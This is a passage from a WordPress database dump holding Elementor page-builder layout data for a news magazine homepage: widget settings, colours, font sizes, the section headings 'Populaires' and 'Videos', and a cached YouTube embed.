\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"zawfnfe\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1391,485,'_elementor_version','0.4'),(1392,485,'_elementor_css','a:3:{s:4:\"time\";i:1508918052;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1393,360,'_oembed_cb74d4022bdef5f2d2b44a0def87c845','<iframe width=\"1200\" height=\"675\" src=\"https://www.youtube.com/embed/0jeXbexRihs?feature=oembed\" frameborder=\"0\" gesture=\"media\" allowfullscreen></iframe>'),(1394,360,'_oembed_time_cb74d4022bdef5f2d2b44a0def87c845','1508918992'),(1396,486,'_elementor_edit_mode','builder'),(1397,486,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_f